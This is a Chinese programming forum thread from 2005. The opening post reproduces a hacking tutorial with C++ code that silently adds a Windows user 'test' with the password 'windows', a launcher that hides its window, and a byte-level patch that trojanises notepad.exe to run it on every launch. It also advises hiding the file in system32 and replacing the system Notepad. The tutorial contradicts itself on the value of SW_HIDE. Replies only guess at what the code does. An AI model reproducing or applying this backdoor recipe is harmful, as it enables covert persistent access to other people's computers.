| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 650 人关注过本帖
标题:[求助][求助]谁看的懂这段代码?
只看楼主 加入收藏
tanaer
Rank: 1
等 级:新手上路
帖 子:7
专家分:0
注 册:2005-6-13
收藏
 问题点数:0 回复次数:5 
[求助][求助]谁看的懂这段代码?
、//测试程序,作用添加一个用户test并修改密码为windows
//AddUser.cpp
#include

int main(int argc, char* argv[])
{
system("net user test /add");
system("net user test windows");

system("pause"); //暂停程序,以便查看程序是否成功运行,实际应用时去掉
return 0;
}

编译一下,将生成的程序重命名为AddUser.exe,运行(如图1)


没有关系,赶紧删除test这个用户

再来看看下面的代码:

// ExecuteAddUser.cpp
#include

int main(int argc, char* argv[])
{
ShellExecute(0, "open", "AddUser.exe", "", "", SW_HIDE); //注意SW_HIDE

system("pause");   //暂停程序,以便查看程序是否成功运行,实际应用时去掉
return 0;
}


也编译一下,生成ExecuteAddUser.exe,现在把AddUser.exe复制到ExecuteAddUser.exe所在的目录。运行ExecuteAddUser.exe, 嘿嘿,你没有看到AddUser.exe闪过dos窗口吧。去看看系统用户,看到test用户了吧。为什么没有显示窗口呢?上面已经表示出来了这里的参数SW_HIDE就是不显示窗口的意思,详细描述请查阅MSDN。而且进程列表里面没有cmd.exe

到这里我们的具体思路就已经出来了:
只要把ExecuteAddUser.exe的代码嵌入到某一个程序里面(假设这里是A.exe),这样每次运行A.exe就会执行我们的AddUser.exe,如果把ExecuteAddUser.exe的代码嵌入到记事本,嘿嘿,那么这个用户就很难从机器上消失了,是不是有点强盗逻辑。

想法是好的,但是要嵌入到某一个程序里面,就需要注意这里的参数SW_HIDE了,因为我们嵌入的时候,代码不能用SW_HIDE。其实SW_HIDE是微软定义的一个宏而已,我想到一个比较傻的办法来解决这个问题。
在vc++的目录搜索。可能很多人没有用过系统的高级搜索功能,具体用法请看图2,终于在WINUSER.H中
找到如下定义:
/*
* ShowWindow() Commands
*/
#define SW_HIDE         0
中间的省略。
#define SW_MAX         11

可以看到SW_HIDE被定义为1。

问题解决了,去掉AddUser.cpp中的system("pause"); 去掉再次编译为AddUser.exe,复制到D盘(这里只是测试,实际上可能会被放到
c:\windows\system32\......,藏得越深越好啊)。

剩下的事情就很简单了基本上就是和孟方明的操作一样。修改如下:

原来的记事本入口:

01006AE0 > $ 6A 70       PUSH 70
01006AE2   . 68 88180001   PUSH notepad.01001888
01006AE7   . E8 BC010000   CALL notepad.01006CA8

修改为:

01006AE0 > $ /E9 BB120000   JMP notepad_.01007DA0
01006AE5   > |90         NOP
01006AE6   . |90         NOP
01006AE7   . |E8 BC010000   CALL notepad_.01006CA8

在01007D74添加如下字符:

01007D74   . 64 3A 5C 5C 4>ASCII "d:\\AddUser.exe",0
01007D84   . 6F 70 65 6E 0>ASCII "open",0



修改01007DA0为:
01007DA0   > \60         PUSHAD
01007DA1   . 6A 00       PUSH 0                       ; /IsShown = 0
01007DA3   . 6A 00       PUSH 0                       ; |DefDir = NULL
01007DA5   . 6A 00       PUSH 0                       ; |Parameters = NULL
01007DA7   . 68 747D0001   PUSH notepad_.01007D74             ; |FileName = "d:\\AddUser.exe"
01007DAC   . 68 847D0001   PUSH notepad_.01007D84             ; |Operation = "open"
01007DB1   . 6A 00       PUSH 0                       ; |hWnd = NULL
01007DB3   . 90         NOP                         ; |
01007DB4   . 90         NOP                         ; |
01007DB5   . 90         NOP                         ; |
01007DB6   . E8 FEAB3F76   CALL SHELL32.ShellExecuteA           ; \ShellExecuteA
01007DBB   . 61         POPAD
01007DBC   . 6A 70       PUSH 70
01007DBE   . 68 88180001   PUSH notepad_.01001888
01007DC3   .^ E9 1DEDFFFF   JMP notepad_.01006AE5


修改完成后保存为note_test.exe,运行,哈哈,没有看到dos窗口吧,看看系统用户吧,有个test吧,呵呵成功。现在修改路径AddUser.exe的路径吧,别忘了在记事本里修改啊,也不要忘了覆盖系统的记事本,除非别人不用记事本,否则。。。。。。呵呵.。

感谢孟方明给大家带来的精彩思路。



是什么语言写的?   
     下面的地址读取那一段大概什么意思?
搜索更多相关主题的帖子: 代码 
2005-06-30 14:53
Stayor
Rank: 1
等 级:新手上路
帖 子:137
专家分:0
注 册:2005-8-4
收藏
得分:0 
不知所云。
2005-08-09 13:32
天堂的叛逆者
Rank: 1
等 级:新手上路
帖 子:25
专家分:0
注 册:2005-8-10
收藏
得分:0 
程序应该是用C++写的吧......
下面的地址读取是在修改系统中的TXT这个程序的代码....仿佛是用汇编写的........

其实这个程序的意思好象是个黑客程序........
添加一个名为test,密码为windows的帐户.....不过在添加的时候好象忘了加权限了.......-_,-~~

2005-08-10 09:01
Stayor
Rank: 1
等 级:新手上路
帖 子:137
专家分:0
注 册:2005-8-4
收藏
得分:0 
楼主的意思是编一个添加用户的程序。然后将这个程序,添加到其它的应用程序(记事本)中。
最后的代码,可能是用反汇编工具,将记事本程序反汇编了。
2005-08-10 20:37
seeker
Rank: 1
等 级:新手上路
帖 子:172
专家分:0
注 册:2005-6-5
收藏
得分:0 
呵呵,反汇编记事本,修改记事本。但这种方法作用不大,除非你能轻易替换人家系统里面的记事本。呵呵。。。。

我相信总有一片天空属于我!http://myseeker. E-Mail:lwqcny@
2005-08-15 22:39
badboy001
Rank: 1
等 级:新手上路
帖 子:16
专家分:0
注 册:2005-5-19
收藏
得分:0 
不是很清楚
2005-10-14 10:18
快速回复:[求助][求助]谁看的懂这段代码?
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.020542 second(s), 7 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved